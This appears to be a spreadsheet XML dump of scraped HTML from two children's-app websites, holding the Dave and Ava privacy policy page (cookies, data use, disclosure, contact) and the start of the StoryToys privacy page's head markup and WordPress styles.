	&lt;div id="donato" style="position:relative;width:100%;"&gt;&lt;/div&gt;_x005F_x000D_
&lt;div class="uk-sticky-placeholder" style="height: 91px; margin: 0px;"&gt;_x005F_x000D_
	  &lt;nav class="tm-navbar uk-navbar uk-navbar-attached" style="margin: 0px;"&gt;_x005F_x000D_
	    &lt;div class="uk-container uk-container-center"&gt;_x005F_x000D_
	      &lt;div class="tm-navbar-wrapper tm-logo-center"&gt;_x005F_x000D_
	        &lt;div class="uk-text-center tm-nav-logo uk-visible-large"&gt;&lt;img src="./images/balerina100.gif" alt="" height="100px" width="100px"&gt; &lt;a class="tm-logo uk-visible-large" href="http://daveandava.com/"&gt;&lt;img src="./images/logo.png" alt=""&gt;&lt;/a&gt; &lt;/div&gt;_x005F_x000D_
	        &lt;div class="tm-nav uk-visible-large"&gt;_x005F_x000D_
	          &lt;div class="tm-nav-wrapper"&gt;_x005F_x000D_
	            &lt;ul class="uk-navbar-nav uk-hidden-small"&gt;_x005F_x000D_
	              &lt;li class="uk-parent" data-uk-dropdown=""&gt; &lt;a href="http://daveandava.com/#"&gt;&lt;/a&gt;_x005F_x000D_
	                &lt;div class="uk-dropdown" align="right"&gt; &lt;a href="https://play.google.com/store/apps/dev?id=7373508554823022012" target="blank"&gt;&lt;img src="./images/googleplay2.png"&gt;&lt;/a&gt; &lt;a href="http://appstore.com/daveandavaltd" target="blank"&gt;&lt;img src="./images/appstore.jpg" alt=""&gt;&lt;/a&gt; &lt;a href="https://www.youtube.com/DaveAndAva" target="_blank" align="right"&gt;&lt;img src="./images/youtube_subscribe_button.png" alt=""&gt;&lt;/a&gt;&lt;/div&gt;_x005F_x000D_
                  &lt;/li&gt;_x005F_x000D_
                &lt;/ul&gt;_x005F_x000D_
              &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
	        &lt;div align="center" class="uk-navbar-content uk-navbar-center uk-hidden-large"&gt;&lt;a class="tm-logo-small" href="http://daveandava.com/"&gt; &lt;img src="./images/logo.png" alt=""&gt;&lt;/a&gt;&lt;br&gt;_x005F_x000D_
	          &lt;br&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/nav&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;div class="tm-wrapper"&gt;_x005F_x000D_
&lt;div class="tm-block tm-block-middle"&gt;_x005F_x000D_
&lt;div&gt;_x005F_x000D_
&lt;div class="uk-container uk-container-center"&gt;_x005F_x000D_
                                                                         _x005F_x000D_
&lt;div class="tm-middle uk-grid" data-uk-grid-match="" data-uk-grid-margin=""&gt;_x005F_x000D_
&lt;div class="tm-main uk-width-medium-1-1"&gt;_x005F_x000D_
&lt;main class="tm-content"&gt;_x005F_x000D_
_x005F_x000D_
&lt;article class="uk-article"&gt;_x005F_x000D_
&lt;h1 class="uk-article-title"&gt;Privacy policy&lt;/h1&gt;_x005F_x000D_
&lt;div&gt;_x005F_x000D_
&lt;div&gt;_x005F_x000D_
&lt;p&gt;Please read this Privacy Policy carefully. This Privacy Policy constitutes the integral part of the agreement between you (also, the ''User'') and the Dave and Ava Ltd. (also, the ''Company'').&lt;br&gt;</t>
  </si>
  <si>
    <t>This Privacy Policy describes the Company's privacy practices with regard to your Personal Data. Personal Data includes any data about you that specifically identifies you as an individual and information about your activities, such as information about your use of our Service, when directly linked to personally identifiable information. By using the Service, you accept this Privacy Policy and consent to the collection, storage, use, and disclosure of your Personal Data in accordance with this Privacy Policy and applicable legislation.</t>
  </si>
  <si>
    <t>You may withdraw your consent and require removal of your Personal Data by contacting us using the information in this paper.&lt;/p&gt;_x005F_x000D_
&lt;h3&gt;Children's privacy&lt;/h3&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;We do not collect, use or share the Personal Data of children (under the age under the applicable law).&lt;/li&gt;_x005F_x000D_
&lt;li&gt;While individuals under the childhood age may use the Services, they shall do so only with the involvement, supervision, and approval of a parent or legal guardian.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;h3&gt;Collection&lt;/h3&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;While you register with the Service, we may request to provide data which is necessary for the provision of services and use of the Service.&lt;/li&gt;_x005F_x000D_
&lt;li&gt;We do not collect your Personal Data when you provide us such data via the contact form on our Service.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;h3&gt;Cookies&lt;/h3&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;To ensure that our application functions properly, we may use various tracking technologies like cookies, web beacons or similar technologies. By using the application, you provide us your consent for our using of cookies and similar tracking technologies under the terms hereof.&lt;/li&gt;_x005F_x000D_
&lt;li&gt;We, or third parties with our permission, may use cookies in the following ways: &lt;br&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li&gt;To manage our business and improve our Service based on factors such as how many users visit or use our Service, what pages and views are accessed, whether visitors are new or repeat visitors, which features of our Service most interest our visitors etc.;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;To remember actions you took to avoid asking you to repeat them during a session or to provide features such as enabling you to resume reading at the last page you accessed, synchronized across devices;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;To measure and analyze activity on our services, or third party services. In addition, we or any provider of such measurement and analytical services may provide non-personally identifiable data to third parties.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;li&gt;The User may block, clear and delete cookies in accordance with the insctuction for their web-browser or device.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;h3&gt;Use&lt;/h3&gt;_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>We may use your Personal Data for the following purposes:&lt;/p&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li&gt;Proper provision of our services;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;Registration;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;Processing of your inquiries and operations as to our Service;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;Analyzing and understanding our audience for the purposes of improving the Service;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;Preventing, detecting and investigating potentially prohibited or illegal activities, including fraud;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;Investigate and/or enforce violations of our Terms of Use and/or this Privacy Policy, or to protect our interests in our operation and our legal rights and protections. Sending you marketing emails with the information about our Services that we deem to be interesting for you. You may opt out of such emails by sending the respective request to us or by clicking the respective link in the email.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;h3&gt;Disclosure&lt;/h3&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;We may disclose some information with certain third parties.</t>
  </si>
  <si>
    <t>&lt;br&gt;We do not share certain information with companies, organizations and individuals outside of the Company unless one of the following circumstances applies: &lt;br&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;We will share your Personal Data with companies, organizations or individuals outside of te Company if we have a good-faith belief that access, use, preservation or disclosure of the Personal Data is reasonably necessary to: &lt;br&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
&lt;li&gt;meet any applicable law, regulation, legal process or enforceable governmental request;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;enforce applicable (Terms of Use), including investigation of potential violations;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;detect, prevent, or otherwise address fraud, security or technical issues;&lt;/li&gt;_x005F_x000D_
&lt;li&gt;protect against harm to the rights, property or safety of the Company, our users or the public as required or permitted by law.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;li&gt;We may share non-personally identifiable information publicly and with our partners. For example, we may share information publicly to show trends about the general use of our services.&lt;/li&gt;_x005F_x000D_
&lt;li&gt;If the Company is involved in a merger, acquisition or asset sale, we will continue to ensure the confidentiality of any Personal Data and give affected Users notice before &lt;br&gt;Personal Data is transferred or becomes subject to a different privacy policy.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;h3&gt;Third parties services&lt;/h3&gt;_x005F_x000D_
&lt;ol&gt;_x005F_x000D_
&lt;li&gt;We do not sell, provide on lease, or share any Personal Data of the Users to third parties.&lt;/li&gt;_x005F_x000D_
&lt;li&gt;Our Service may contain links to and from third parties’ websites, apps or other services (including social media). If you follow a link to any of them, please note that those websites have their own privacy practices.</t>
  </si>
  <si>
    <t>We shall not be liable for the respective policies and any collection, use or disclosure of your Personal Data in accordance thereto. Please check the third parties’ policies before you submit any Personal Data to their services.&lt;/li&gt;_x005F_x000D_
&lt;li&gt;When we use third-party vendors to perform certain services on behalf of us, such as hosting the site or application, analytical or other services, such third-party vendors may collect or have access to information about you (for example, automatically collected information through tracking technologies). Please recognize that we and/or our vendors may store this information and share this information with third parties as necessary to provide you with our services.&lt;/li&gt;_x005F_x000D_
&lt;/ol&gt;_x005F_x000D_
&lt;h3&gt;Amendments to Privacy Policy&lt;/h3&gt;_x005F_x000D_
&lt;p&gt;</t>
  </si>
  <si>
    <t>We have the right to amend this Private Policy at any time, without prior notice to each User. Any changes we may make to our Privacy Policy in the future will be posted here. Where appropriate, we will notify you or seek your consent.</t>
  </si>
  <si>
    <t xml:space="preserve">Please check back frequently to see any updates or changes to our Privacy Policy.&lt;/p&gt;_x005F_x000D_
&lt;h3&gt;Contact info&lt;/h3&gt;_x005F_x000D_
&lt;p&gt;If at any time you would like to contact us with your views about our privacy practices, or with any enquiry relating to your Personal Data (its correction, removal or use), you can do so by sending a letter to our email address: &lt;span id="cloak16563"&gt;&lt;a href="mailto:hello@daveandava.com"&gt;hello@daveandava.com&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;/article&gt;_x005F_x000D_
&lt;/main&gt;_x005F_x000D_
&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;div style="position: absolute; top: 0px; left: -6868px;"&gt;Timber by &lt;a target="_blank " href="http:http://www.emsien3.com/"&gt;EMSIEN-3&lt;/a&gt; LTD&lt;/div&gt;&lt;/div&gt;            _x005F_x000D_
        _x005F_x000D_
        _x005F_x000D_
&lt;div class="tm-block tm-bottom tm-block-image"&gt;_x005F_x000D_
&lt;footer class="tm-footer uk-text-center"&gt;_x005F_x000D_
&lt;div class="uk-panel"&gt;_x005F_x000D_
 &lt;p&gt;Subscribe to watch our nursery rhymes on YouTube&lt;/p&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;a href="https://www.youtube.com/DaveAndAva" target="_blank"&gt;&lt;img src="./images/youtube_subscribe_button.png" alt=""&gt;&lt;/a&gt;_x005F_x000D_
&lt;br&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
&lt;span&gt;Follow us:&lt;/span&gt;&lt;br&gt;_x005F_x000D_
&lt;a href="https://www.youtube.com/DaveAndAva" class="uk-icon-button uk-icon-youtube uk-margin-small-top" target="_blank"&gt;&lt;/a&gt;_x005F_x000D_
&lt;a href="https://www.facebook.com/daveandavatv" class="uk-icon-button uk-icon-facebook uk-margin-small-top" target="_blank"&gt;&lt;/a&gt;_x005F_x000D_
&lt;a href="https://twitter.com/daveandava" class="uk-icon-button uk-icon-twitter uk-margin-small-top" target="_blank"&gt;&lt;/a&gt;_x005F_x000D_
&lt;a href="https://instagram.com/daveandava" class="uk-icon-button uk-icon-instagram uk-margin-small-top" target="_blank"&gt;&lt;/a&gt;_x005F_x000D_
&lt;br&gt;&lt;br&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
&lt;span style="text-align: center; margin-right: 10px;"&gt;Tell a friend: _x005F_x000D_
&lt;br&gt;_x005F_x000D_
&lt;a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.daveandava.com/" data-text="Rediscover nursery rhymes! 3D animationed educational videos for young kids -" data-via="daveandava" data-count="none" style="margin-top:-5px;"&gt;Tweet&lt;/a&gt;_x005F_x000D_
_ x000D_
	&lt;script&gt;!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');&lt;/script&gt;_x005F_x000D_
&lt;/span&gt;_x005F_x000D_
	_x005F_x000D_
&lt;br&gt;&lt;br&gt;&lt;br&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
	_x005F_x000D_
&lt;div class="uk-panel"&gt;_x005F_x000D_
&lt;p&gt;2022</t>
  </si>
  <si>
    <t xml:space="preserve">© Dave and Ava | &lt;a href="privacy-policy.html"&gt;Privacy Policy&lt;/a&gt;&lt;/p&gt; _x005F_x000D_
&lt;p&gt;&lt;a href="mailto: hello@daveandava.com"&gt;hello@daveandava.com&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
&lt;/div&gt;&lt;br&gt;&lt;/footer&gt;         _x005F_x000D_
                        _x005F_x000D_
			_x005F_x000D_
			_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;/div&gt;_x005F_x000D_
&lt;a id="scrollToTop" title="" class="scrollToTop" style="visibility: hidden; opacity: 0;"&gt;_x005F_x000D_
	&lt;img src="images/scroll-to-top-4.png" alt=""&gt;_x005F_x000D_
&lt;/a&gt;_x005F_x000D_
&lt;/body&gt;&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en-GB"&gt;&lt;head&gt; &lt;script type="text/javascript"&gt;if(!gform){document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0});var gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&amp;&amp;gform.scriptsLoaded?o():!gform.domLoaded&amp;&amp;gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&amp;&amp;(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&amp;&amp;(i=n+"_"+e.length),null==t&amp;&amp;(t=10),gform.hooks[o][n].push({tag:i,callable:r,priority:t})},doHook:function(o,n,r){if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[o][n]){var t,i=gform.hooks[o][n];i.sort(function(o,n){return o.priority-n.priority});for(var e=0;e&lt;i.length;e++)"function"!=typeof(t=i[e].callable)&amp;&amp;(t=window[t]),"action"==o?t.apply(null,r):r[0]=t.apply(null,r)}if("filter"==o)return r[0]},removeHook:function(o,n,r,t){if(null!=gform.hooks[o][n])for(var i=gform.hooks[o][n],e=i.length-1;0&lt;=e;e--)null!=t&amp;&amp;t!=i[e].tag||null!=r&amp;&amp;r!=i[e].priority||i.splice(e,1)}}}&lt;/script&gt;&lt;meta charset="UTF-8" /&gt;&lt;meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"&gt;&lt;link rel="profile" href="https://gmpg.org/xfn/11" /&gt;&lt;link rel="pingback" href="https://storytoys.com/xmlrpc.php" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;&lt;title&gt;StoryToys Apps Privacy &amp;amp; Security Policy&lt;/title&gt;&lt;meta name="description" content="At StoryToys we care about your privacy and we respect your privacy rights.</t>
  </si>
  <si>
    <t>Read our App Privacy &amp;amp; Security Policy here." /&gt;&lt;link rel="canonical" href="https://storytoys.com/privacy/" /&gt;&lt;meta property="og:locale" content="en_GB" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:type" content="article" /&gt;&lt;meta property="og:title" content="StoryToys Apps Privacy &amp;amp; Security Policy" /&gt;&lt;meta property="og:description" content="At StoryToys we care about your privacy and we respect your privacy rights.</t>
  </si>
  <si>
    <t>Read our App Privacy &amp;amp; Security Policy here." /&gt;&lt;meta property="og:url" content="https://storytoys.com/privacy/" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:site_name" content="StoryToys" /&gt;&lt;meta property="article:publisher" content="https://www.facebook.com/StoryToys" /&gt;&lt;meta property="article:modified_time" content="2023-04-05T13:23:57+00:00" /&gt;&lt;meta property="og:image" content="https://storytoys.com/wp-content/uploads/2023/03/COPPA.png" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="twitter:card" content="summary_large_image" /&gt;&lt;meta name="twitter:site" content="@storytoys" /&gt; &lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://storytoys.com/#organization","name":"StoryToys","url":"https://storytoys.com/","sameAs":["https://www.facebook.com/StoryToys","https://www.instagram.com/storytoys_apps/","https://www.youtube.com/user/storytoys","https://twitter.com/storytoys"],"logo":{"@type":"ImageObject","@id":"https://storytoys.com/#logo","inLanguage":"en-GB","url":"https://storytoys.com/wp-content/uploads/2021/02/story-toys-apps.png","contentUrl":"https://storytoys.com/wp-content/uploads/2021/02/story-toys-apps.png","width":400,"height":400,"caption":"StoryToys"},"image":{"@id":"https://storytoys.com/#logo"}},{"@type":"WebSite","@id":"https://storytoys.com/#website","url":"https://storytoys.com/","name":"StoryToys","description":"Apps to help your child learn, play and grow","publisher":{"@id":"https://storytoys.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":"https://storytoys.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-GB"},{"@type":"ImageObject","@id":"https://storytoys.com/privacy/#primaryimage","inLanguage":"en-GB","url":"https://storytoys.com/wp-content/uploads/2023/03/COPPA.png","contentUrl":"https://storytoys.com/wp-content/uploads/2023/03/COPPA.png","width":140,"height":70},{"@type":"WebPage","@id":"https://storytoys.com/privacy/#webpage","url":"https://storytoys.com/privacy/","name":"StoryToys Apps Privacy &amp; Security Policy","isPartOf":{"@id":"https://storytoys.com/#website"},"primaryImageOfPage":{"@id":"https://storytoys.com/privacy/#primaryimage"},"datePublished":"2014-08-05T14:09:12+00:00","dateModified":"2023-04-05T13:23:57+00:00","description":"At StoryToys we care about your privacy and we respect your privacy rights. Read our App Privacy &amp; Security Policy here.</t>
  </si>
  <si>
    <t>","breadcrumb":{"@id":"https://storytoys.com/privacy/#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https://storytoys.com/privacy/"]}]},{"@type":"BreadcrumbList","@id":"https://storytoys.com/privacy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://storytoys.com/"},{"@type":"ListItem","position":2,"name":"Privacy"}]}]}&lt;/script&gt;&lt;link rel='dns-prefetch' href='//fonts.googleapis.com' /&gt;&lt;link rel="alternate" type="application/rss+xml" title="StoryToys &amp;raquo; Feed" href="https://storytoys.com/feed/" /&gt;&lt;link rel="alternate" type="application/rss+xml" title="StoryToys &amp;raquo; Comments Feed" href="https://storytoys.com/comments/feed/" /&gt; &lt;script type="text/javascript"&gt; window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/storytoys.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};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</si>
  <si>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 important;
 margin: 0 0.07em ! important;
 vertical-align: -0.1em !important;
 background: none !important;
 padding: 0 !important;
} &lt;/style&gt;&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://storytoys.com/wp-includes/css/classic-themes.min.css?ver=6.2'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t>
  </si>
  <si>
    <t>6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined:</t>
  </si>
  <si>
    <t>6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp:</t>
  </si>
  <si>
    <t>6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>important;}body .is-layout-constrained &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained &gt; .aligncenter{margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex &gt;</t>
  </si>
  <si>
    <t>*{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-color{color: var(--wp--preset--color--white) !</t>
  </si>
  <si>
    <t>important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) ! important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) ! important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) ! important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) ! important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) ! important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !</t>
  </si>
  <si>
    <t>important;}.has-black-background-color{background-color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !</t>
  </si>
  <si>
    <t>important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) ! important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) ! important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) ! important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) ! important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) ! important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) ! important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) ! important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !</t>
  </si>
  <si>
    <t>important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) ! important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) ! important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !</t>
  </si>
  <si>
    <t>important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) ! important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) ! important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !</t>
  </si>
  <si>
    <t>important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) ! important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) ! important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !</t>
  </si>
  <si>
    <t>important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) ! important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) ! important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !</t>
  </si>
  <si>
    <t>important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;} &lt;/style&gt;&lt;link rel='stylesheet' id='cookie-law-info-css' href='https://storytoys.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-public.css?ver=2.0.4' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='cookie-law-info-gdpr-css' href='https://storytoys.com/wp-content/plugins/cookie-law-info/public/css/cookie-law-info-gdpr.css?ver=2.0.4' type='text/css' media='all' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='stylesheet' id='rs-plugin-settings-css' href='https://storytoys.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.3.2' type='text/css' media='all' /&gt; &lt;style id='rs-plugin-settings-inline-css' type='text/css'&gt; #rs-demo-id {} &lt;/style&gt;&lt;link rel='stylesheet' id='uaf_client_css-css' href='https://storytoys.com/wp-content/uploads/useanyfont/uaf.css?ver=1624364277' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='mediaelement-css' href='https://storytoys.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='wp-mediaelement-css' href='https://storytoys.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-default-style-css' href='https://storytoys.com/wp-content/themes/bridge/style.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='stylesheet' id='bridge-qode-font_awesome-css' href='https://storytoys.com/wp-content/themes/bridge/css/font-awesome/css/font-awesome.min.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-qode-font_awesome_5-css' href='https://storytoys.com/wp-content/themes/bridge/css/font-awesome-5/css/font-awesome-5.min.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-stylesheet-css' href='https://storytoys.com/wp-content/themes/bridge/css/stylesheet.min.css?ver=6.2' type='text/css' media='all' /&gt; &lt;style id='bridge-stylesheet-inline-css' type='text/css'&gt; .page-id-1875.disabled_footer_top .footer_top_holder, .page-id-1875.disabled_footer_bottom .footer_bottom_holder { display: none;} &lt;/style&gt;&lt;link rel='stylesheet' id='bridge-print-css' href='https://storytoys.com/wp-content/themes/bridge/css/print.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-style-dynamic-css' href='https://storytoys.com/wp-content/themes/bridge/css/style_dynamic.css?ver=1634917617' type='text/css' media='all' /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel='stylesheet' id='bridge-responsive-css' href='https://storytoys.com/wp-content/themes/bridge/css/responsive.min.css?ver=6.2' type='text/css' media='all' /&gt;&lt;link rel='stylesheet' id='bridge-style-dynamic-responsive-css' href='https://storytoys.com/wp-content/themes/bridge/css/style_dynamic_responsive.css?ver=1634917617' type='text/css' media='all' /&gt; &lt;style id='bridge-style-dynamic-responsive-inline-css' type='text/css'&gt; .thin-mg .vc_column-inner {padding: 0 5px !important}
.blog_holder article .post_text</t>
  </si>
  <si>
    <t>h2 .date {display: none !important;}
.wpb_text_column ul li a:link,.wpb_text_column ol li a:link{text-decoration: underline !important;font-weight: bold !important;}
.blue-border-image .vc_single_image-wrapper {
 border: 1px solid #EBF7FA !important;
}
.blog_holder article .post_info {    display: none !important}
.big-link a{font-size:24px;font-family: 'corporativesansbold' ! important}
.blue-txt *{color:#173e72}
footer {    background: #173e72 !important;}
